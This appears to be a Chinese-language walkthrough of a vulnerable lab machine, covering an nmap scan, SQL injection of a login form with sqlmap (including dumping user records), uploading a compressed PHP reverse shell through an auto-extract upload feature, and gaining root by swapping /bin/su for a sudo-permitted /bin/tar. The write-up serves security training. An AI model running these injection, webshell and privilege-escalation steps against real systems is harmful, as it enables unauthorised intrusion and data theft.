一、靶场搭建
搭好后发现扫描不到主机,更换一下mac地址
00:0C:29:BC:05:DE
二、主机探测与端口扫描
nmap 192.168.121.0/24
发现开放80端口
三、访问80服务
1.来到login页面
发现有登录框,我们进行sql注入测试
输入账号密码用burp抓包
复制请求包到kali上,在password字段后面加*号
利用sqlmap执行命令
sqlmap -r burp.txt --batch --random-agent
发现存在sql注入,可使用万能密码登录
利用--dump命令打印出用户信息
sqlmap -r burp.txt --batch --random-agent --dump
2.登录
登录发现有文件上传功能点,默认万能密码登录是第一个用户,发现不能上传,我们切换第二个用户
来到upload页面,我们上传一个webshell文件
来到用户目录下
http://192.168.121.164/~etenenbaum/
上传成功!但是未能成功解析
我们想起来了上面勾选的那个自动解压按钮,利用kali自带的webshell并将其压缩
find / -type f -name "php*reverse*"
cp /usr/share/webshells/php/php-reverse-shell.php ./
tar -czf php.tar.gz php-reverse-shell.php
然后选中自动解压选项,上传
发现成功自动解压,然后利用kali开启监听
反弹成功!
3.提权
sudo -l
利用三方网站
https://gtfobins.github.io/
我们这里选择使用mv提权
sudo mv /bin/tar /bin/tar.bak
sudo mv /bin/su /bin/tar
sudo tar
可以看到,提权成功